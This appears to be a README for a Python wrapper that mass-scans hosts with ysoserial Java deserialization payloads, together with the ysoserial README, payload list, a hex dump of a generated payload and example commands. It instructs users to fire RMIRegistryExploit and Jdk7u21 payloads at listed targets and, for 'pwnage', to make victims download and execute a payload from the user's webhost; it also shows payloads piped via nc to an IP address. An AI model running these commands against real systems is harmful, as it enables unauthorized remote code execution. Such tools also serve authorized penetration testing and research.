Default settings will throw the RMIRegistryExploit and Jdk7u21 payload combination over the ports listed in ports.txt against the systems you've defined in targets.txt.
You must define targets in targets.txt
You must define a webhost (--host), this will listen for connections or serve up your ps1/elf.
You must define a webhost port (--port), this is the port that victim will connect to your webhost on.
This should be considered a scanner and so a lot of noise should be expected. If you use python (SimpleHTTPServer) to listen for connections be sure to save your scan results. Else, use apache and check your logs.
For pwnage, comment out the first command that tells your webhost which system is vulnerable to what and uncomment out the second command which will download and execute a payload. There is also a set of commands you can walk through to exploit linux/aix systems.
If you're so inclined, feel free to use all the payloads instead of only Jdk7u21. I haven't played with a lot of the newer payloads that are included now, but my experience from when this was relatively new showed that more than 90% of the time if Groovy1 or any of the Sping or CommonCollections payloads worked, so did Jdk7u21.
usage: iterpysoserial.py [-h] [--targets TARGETS] [--ports PORTS]
[--exploits EXPLOITS] [--payloads PAYLOADS] --host
HOST --port PORT
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Released as part of AppSecCali 2015 Talk "Marshalling Pickles: how deserializing objects will ruin your day" with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x). Later updated to include additional gadget chains for JRE <= 1.7u21 and Apache Commons Beanutils.
ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath.
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
$ java -jar target/ysoserial-0.0.4-all.jar
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
Available payload types:
BeanShell1 [org.beanshell:bsh:2.0b5]
CommonsBeanutilsCollectionsLogging1 [commons-beanutils:commons-beanutils:1.9.2, commons-collections:commons-collections:3.1, commons-logging:commons-logging:1.2]
CommonsCollections1 [commons-collections:commons-collections:3.1]
CommonsCollections2 [org.apache.commons:commons-collections4:4.0]
CommonsCollections3 [commons-collections:commons-collections:3.1]
CommonsCollections4 [org.apache.commons:commons-collections4:4.0]
Groovy1 [org.codehaus.groovy:groovy:2.3.9]
Jdk7u21 []
Spring1 [org.springframework:spring-core:4.1.4.RELEASE, org.springframework:spring-beans:4.1.4.RELEASE]$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
$ java -jar ysoserial-0.0.4-all.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 < groovypayload.bin
$ java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe- Download the latest jar from JitPack
.
Note that GitHub-hosted releases were removed in compliance with the GitHub Community Guidelines
Requires Java 1.7+ and Maven 3.x+
mvn clean package -DskipTests
- Fork it
- Create your feature branch (
git checkout -b my-new-feature) - Commit your changes (
git commit -am 'Add some feature') - Push to the branch (
git push origin my-new-feature) - Create new Pull Request